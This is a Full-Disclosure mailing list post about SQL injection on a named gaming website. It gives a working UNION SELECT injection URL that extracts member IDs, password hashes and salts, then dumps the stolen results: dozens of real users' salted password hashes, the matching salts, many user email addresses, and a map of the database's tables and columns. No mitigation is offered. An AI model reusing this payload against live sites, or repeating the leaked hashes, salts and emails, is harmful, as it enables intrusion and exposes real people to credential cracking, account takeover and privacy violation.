Full Disclosure: rpgrevolution.com SQL Injection

[Bob Smith <bobbyhadababyitsaboy () googlemail com>]

/home/rpgrev/domains/rpgrevolution.com/public_html/

http://www.rpgrevolution.com/games.php?platform=all&genre=aaaaaaaaaaaaaaaaaaaaaaa'
union select 
1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id

Salted

63217a559a7be4704156457c633c3344,4164d790f0047fc513b66ae1897bd6f2,16bd17aa7cb278c5520b021838a84a97,fe1d2c340c644126ba041bf0e97b7626,4263acb3502f6398ceb3841aa597fc5b,1da97968c870b5e8f4f8bd8897818056,5d9d9fa96b96c6c65b0673574a35453a,3f2e95b48762eb5b05f2424cfa80892a,6be4fb54d289d423ad69d9ef9b644156,731860ca22a89f0892a167f2afc81fa5,0b554ca29560318413f628347f46739b,07f2abe0dd2f40f0645e516f0f99325f,5f6ca10a7f1b0161acec092e4bee3c3c,1f2f49e8cf15428c350d96e2c2657d8b,c3d4f999324da31ee27cded6f9afde82,8787496111945c44e9d1bf62c43f9a40,5eaa772f28ca4c5832b997a6d24eb583,7e0e12c300b74661b6d6af08061d9363,0b2b5b1fb0dd8741328306b11166db63,57701c03e318d9fd39c56770b5f8a690,3dc61c20f521ead4381f02d9e99a0f46,e4a109ad7f09f3592b66c1ff3bce757b,562cd66fb31032973b116c4f5e9d01ac,a1815b2be6045fb98d850b96f0826ea3,d5234683d52606e67c9892c848a27eef,d2944383a1a72ae25b1dc49099ce0fa8,e161df49ddeda84829f2dd450a787632,d5be51ebf16f3768e52ca3ce7dc8372e,4a810955d9c4d9c956c14e8870c88338,615019960314d071fea6c37eaf363dca,
 67539a45a48399e929963918277ab37f

Corresponding Salt

lNF@,,av7 () 
e,zm?m/,~>H;<,EKu(h,#Z/q;,q$[Qc,9D.e},C|@;Z,E;hhO,eIG,u,+4Vqb,)p%/},q:Z{T,W'.Tj,THvsH,_f|+g,b[3tA,4%BuP,4n^n6,P(/.e,VliRl,xfA%a,U9Rce,C-JY3,qgoB~,|9P3Q,W],*`,$]S+G,Pz_Fw,:y@/,,5.LMi,>r1d?,krR)@,70=1|,}}~rI,|Hr[f,Xz)Db,KvXc^,h9'F},~J)er,J/QNO,F*I*O,43fh2,B3lLg,r|zjv,:mZ>j,MpLdR,$ScWu,MC7S[,F.LS.,xVToc,#vj?(,(5-R+,E:?p7,<8Mi{,s/%Z8,wb*zC,2W0Ag,H]%~{,68wdx,z3"Q),^Ir#6,girRW,xhd#j,d8`_x,]:9_z,-n3^b,L3z`0,U,~Jy,]{}:^,4+4<`,HdJ?B,uDjFw,%1MZF,q4{-N,w%d/:,9UXJ{,+2up5,V
 () 
Xul,L]M/5,G/&Vg,tZB<U,O}Wiu,pWy45,G:tw=,Ii%*9,PAstq,^J-O-,`9VS0,5pU}f,00|vf,B9*Td,jHrs=,lxEp3,?d#3J,@Lv2,,&]]R8,piB07,n3{(U,&oNQC,I8-*@,7H+b9,5tAce,RMJNT,aj%Wq,zru'0,cN%^m,u7
 () f4,P%/==,-IH/U,$iI8%,xp?NY,NAzQ9,=h.Xi,_n7P=,8IMKh,ej<]x,ZuWFg,oEe () 
1,n<^"],K!~[&,B|!{=,Gq9vP,7.-jc,i=c]q,"]']$,7I;]K,)zydA,v$/o?,`'z^f,`ug!),Mh+SM,]T,k9,x^T-!,U&.>M,Y51Vn,;@TW1,_]^H:,v^'E.,1_:;+,{ovD.,lF"^|,y`:v^,Gd4h|,Ju`/C,1UV/l,1J'*G,0m86q,qq!Xf,]S8h(,GWsR(,g[1<R,h#gGW,@?ecm,%oR&l,PA7K`,C3$*},@<dA@,]G83D,&;oJ<,hU)q{,T=}W~,5Nad],gI
 () eS,
 MVA{D,%D`*M,JvDx[,.=&_E,Q>PLx,hlu4

minsu86 () gmail com,cooldude2k () gmail com,sir.shaun () gmail com,psychoantwon () gmail com,jcink2k () gmail 
com,jonathan.pandgir () gmail com,renee2k () gmail com,stepan_par () msn com,webmaster () mvpmrd zzn com,kumihosan () 
gmail com,josemmm () terra com br,riou () mygen24 com,ruze8890 () gmail com,ivan_polanco18 () hotmail com,gary () 
hipdev com,diana_sexylady () hotmail com,saboor_ryu () hotmail com,gf () nana co il,unconformist () gmail com,renate2k 
() gmail com,xsilverblade () msn com,knigt2 () hotmail fr,theomen9mm () hotmail com,eleven11 () mail com,klein.99 () 
gmail com,nickctm () gmail com,game_boi_sp () hotmail com,when_is_now () hotmail com,tiggerville2929 () gmail 
com,cyferki () o2 pl,guardian_drayal () hotmail com,hitman19 () t-online de,jayce () divinelegy com,crprince () telus 
net,jellyman () charter net,jellydude3443 () yahoo com,ultrapokemaniac () yahoo com,nukehunter () hotmail 
com,hawkfire01 () hotmail com,kekko90 () aliceposta it,bballtj93 () verizon net,zamual05 () msn com,memorym () walla co 
il,quickcutthroat () yahoo com,drew_samuelsen () hotmail com,cecilvanhelsing () gmail com,fresc
 o_dewidt () hotmail com,

access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, -- id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users, --api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,ibf_arcade_news,ibf_arcade_scoreboard,ibf_arcade_sessions,ibf_arcade_sitngo,ibf_arcade_sitngo_plyers,ibf_arcade_tartemp,ibf_attachments,ibf_attachments_type,ibf_badwords,ibf_banfilters,ibf_bulk_mail,ibf_cache_store,ibf_cal_calendars,ibf_cal_events


ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_challenge_banned,arcade_challengeid,arcade_challenge,arcade_u_cha,arcade_session,arcade_time_spent,user_r_pp,jackpots_won,jackpots_points,arcade_won,arcade_spent,arca
 de_activity,arcade_activitywon,user_u_columns,


ibf_sessions-id,member_name,member_id,ip_address,browser,running_time,login_type,location,member_group,in_error,in_dldo,in_dlcat,in_dlfile,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id,in_game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/